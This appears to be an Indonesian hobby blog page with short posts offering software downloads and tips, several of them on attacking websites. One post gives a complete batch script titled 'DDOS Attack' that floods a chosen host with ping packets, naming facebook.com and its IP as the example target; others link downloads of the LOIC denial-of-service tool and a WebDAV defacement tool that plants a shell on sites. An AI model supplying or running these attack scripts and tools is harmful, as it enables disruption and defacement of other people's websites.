Senin, 11 Februari 2013

3 download visual basic 6 portable.


yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah lama kagak pernah otak-atik blog lagi ..artikel kali ini tentang link download  visual basic 6 portable.. langsung aja cekidot :D



nih ane kasih link download,nya vie mediafire langsung aja klik disini

Pasti pada penasaran apa kegunaan dari visual basic ini ?? iya kan ?? hehehe ^_^

kegunaan visual basic itu untuk membuat program berbasis windows mulai yang sederhana sampai pemrograman yang lebih kompleks contoh,nya untuk membuat aplikasi untuk kasir .


GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] [pro_fir grup organitation]






Jumat, 18 Januari 2013

1 download raging thunder for android


yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah lama kagak pernah otak-atik blog lagi ..artikel kali ini tentang link download  raging thunder for android .. langsung aja cekidot :D





masih penasaran kan main,nya gimana ?? pasti seruh deh :D .. download aja disini

1.kalau sudah di dwonload pindah ke android kamu.
2.file ini berbentuk .apk 
3.jadi install dulu baru main ^,^
4.selamat mencoba ..

GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] [pro_fir grup organitation]



Rabu, 16 Januari 2013

0 cara merubah tampilan kursor di windows 7


yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah lama kagak pernah otak-atik blog lagi ..artikel kali ini cara merubah tampilan kursor di windows 7  .. langsung aja cekidot :D

sebelum melakukan cara dibawah download kumpulan mouse,nya di : download

jika agan sudah nyalain PC langsung klik kanan dan pilih personalize  dan klik change mouse pointer ..


kalau sudah maka akan keluar seperti ini :


jika sudah browse dan cari file yang tadi yang udah di download .. pastikan extract dulu ya :D 



GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] [pro_fir grup organitation]




Sabtu, 12 Januari 2013

0 Download LOIC [ Low Orbit Ion Canon ]


yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah lama kagak pernah otak-atik blog lagi ..artikel kali ini DOS attack dengan LOIC  .. langsung aja cekidot :D

seperti ini nih screen shoot,nya :D



link download : http://www.mediafire.com/?edb79dusp8b05de


GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] [pro_fir grup organitation]



Senin, 24 Desember 2012

0 DOS attack dengan menggunakan notepad


yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah 4 bulan kagak pernah otak-atik blog lagi ..artikel kali ini tentang cara DOS attack dengan menggunakan notepad  .. langsung aja cekidot :D

1.buka Notepad 

copy script ini :

   @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS



                                      2,jika sudah simpan file ini di documents dalam bentuk.bat 



3.bukalah file .bat yang tadi kamu simpan di documents


4.jika sudah buka maka ketik di server target : (misal)www.facebook.com. lalu tekan enter makan akan keluar ip dari web tersebut 31.13.79.7


disitu akan keluar ip host : ketik ip target anda misal [31.13.79.7] dan enter.. packet size isi 10000

lalu hasil seperti ini .. 


GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] [pro_fir grup organitation]






Minggu, 23 Desember 2012

0 membuat efek font seperti memantul


yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah 4 bulan kagak pernah otak-atik blog lagi ..artikel kali ini tentang cara membuat efek font seperti memantul langung aja cekidot :D..







GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] Danger Editor [pro_fir grup organitation]

0 Deface website dengan webdaf

yahh sobat blogger kali ini ane kasih postingan baru ni ^,^.. setelah udah 4 bulan kagak pernah otak-atik blog lagi ..artikel kali ini tentang cara deface website dengan webdaf .. langsung aja cekidot :D

1.jika sobat belum ada webdaf di PC silahkan download di http://www.ziddu.com/download/19804542/webdavhmei7.exe.html  [ via ziddu ]
http://www.4shared.com/file/psV_a5r4/webdav_hmei7.html [via 4shared ]



2.lakukan langkah berikut seperti do foto :) 





3.jika ada tulisan shell created berarti deface berhasil :)



4.copy dan pastekan pada google chrome / mozila 


5.inilah hasil,nya :D 


GIMANA  ?? udah bisa belum ?? pasti udah bisa lah :D
kalau mau copas sertakan copyright,nya ya :D

[C] [pro_fir grup organitation]